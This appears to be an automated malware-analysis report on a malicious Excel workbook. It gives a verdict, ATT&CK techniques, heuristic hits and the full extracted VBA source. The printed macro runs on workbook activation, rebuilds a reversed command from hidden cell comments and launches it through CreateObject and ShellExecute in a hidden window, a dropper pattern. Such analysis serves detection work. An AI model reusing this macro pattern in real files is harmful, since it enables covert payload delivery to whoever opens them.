Verdict: MALICIOUS (Risk Score: 100)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is an Excel file containing VBA macros. The macros utilize `CreateObject` to instantiate an object and then call `ShellExecute` with a constructed command. This indicates an attempt to download and execute a second-stage payload, likely from a remote source, which is a common technique for malware delivery. The specific URL or command is obfuscated within the VBA code.
Heuristics (3)
- Reference to ShellExecute API (severity: high, rule: SC_STR_SHELLEXEC): Reference to ShellExecute API
- VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS): Document contains VBA macro code
- CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:

  ```vb
  Set cRlofpE = CreateObject(t7)
  cRlofpE.ShellExecute "P" + n1, A2, "", "", 0
  ```
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1532 bytes |

SHA-256: 135b801221c396b9fe20211b041cd1d34dfd3e51f9e077f0542a396cf65dd310
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
    Dim mNxn, gzTrM, AaJREXm, yDKF
    Set yDKF = Worksheets("Sheet1")
    mNxn = yDKF.Range("D500").NoteText + yDKF.Range("D501").NoteText + yDKF.Range("D502").NoteText + yDKF.Range("D503").NoteText + yDKF.Range("D504").NoteText + yDKF.Range("D505").NoteText + yDKF.Range("D506").NoteText + yDKF.Range("D507").NoteText
    t8hg0 = yDKF.Range("D508").NoteText
    y70fdsd = yDKF.Range("D509").NoteText
    AaJREX = LOL.lmgha(DUDgvCs(mNxn), t8hg0, y70fdsd)
End Sub
Function DUDgvCs(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
        StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    DUDgvCs = StrNew
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "LOL"
Function lmgha(A2, n1, t7)
    Dim cRlofpE
    Set cRlofpE = CreateObject(t7)
    cRlofpE.ShellExecute "P" + n1, A2, "", "", 0
End Function
```